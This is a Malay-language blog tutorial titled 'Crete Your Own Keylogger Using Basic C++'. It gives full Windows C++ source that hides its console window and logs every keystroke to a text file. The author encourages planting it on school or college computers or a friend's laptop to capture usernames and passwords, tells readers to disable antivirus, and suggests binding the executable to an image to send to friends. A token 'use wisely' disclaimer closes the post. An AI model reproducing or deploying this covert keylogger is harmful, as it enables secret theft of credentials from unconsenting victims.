Home » » Crete Your Own Keylogger Using Basic C++

Crete Your Own Keylogger Using Basic C++



Assalamualaikum.
Petang ni nak ajar korang semua cara buat keylogger. ^___^

well..part yang paling seronok dalam dunia hacking ni antaranya ialah spying. So, harni kita belajar C++ Spyware Code. Bole tanam keylogger ni kat ICT skola ke, Kolej ke..or maybe, laptop kawan sendiri. Senang2 bole dapat username ngan password. Lagi senang la kalau bandingkan dengan phishing. Okkay..let's begin.

How to create Keylogger using C++
Requirements
Dev C++. Download kat sini Dev C++
Otak Yang Sihat. ( Sangat diperlukan)

Install Dev C++ kat pc/lappy korang
Run Dev C++ tu
File > New > Source File
Sekarang paste keylogger code kat bawah ni ke dalam workspace tu

#include  
using namespace std; 
#include  
#include  
int Save (int key_stroke, char *file);
void Stealth();

int main() 
{
Stealth(); 
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt"); 
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]"); 
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n"); 
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB) 
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}

Compile kod tu ( Ctrl + F9)


Execute > Run ( Ctrl + F10)

Sebelum tu disable dulu antivirus korang sebab kita nak test kat komputer sendiri. nanti dye detect virus. So, disable jap
Sekarang keylogger tu da tertanam dalam sistem korang. Apa sahaja korang tulis (keystroke) akan masuk dekat file Log.txt
bukak la kat mana korang simpan file Log.txt tu

Extra
Bind exe file tu dengan apa2 image / file. Hantar kat kawan korang. haha
atau
Install kat sekolah korang punye sistem. Ok Bye
Knowledge Is For All, Use Your Knowledge Wisely
Jangan salah guna ye....
Share this article :

2 comments:

BANNER

ADVERTISE

 
Support : Your Link | Your Link | Your Link
Copyright © 2013. Va Shazwan - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger